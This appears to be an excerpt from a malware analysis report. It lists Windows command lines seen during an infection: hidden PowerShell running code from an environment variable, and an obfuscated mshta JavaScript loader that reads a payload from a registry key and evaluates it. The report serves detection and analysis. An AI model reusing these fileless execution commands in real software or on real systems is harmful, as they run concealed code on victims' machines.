Technical Information
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:mhcql' (with hidden window)
- '<SYSTEM32>\mshta.exe' javascript:VPvI35SGz="iRKiWKp";bk7=new%20ActiveXObject("WScript.Shell");H3dPjZ2Lc="z6gimx";Wy1A4Q=bk7.RegRead("HKLM\\software\\Wow6432Node\\M1krumfClR\\6xGsTm");Yr06CAV="0bK";eval(Wy1A4Q);d9SQs...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:mhcql
- '%WINDIR%\syswow64\regsvr32.exe'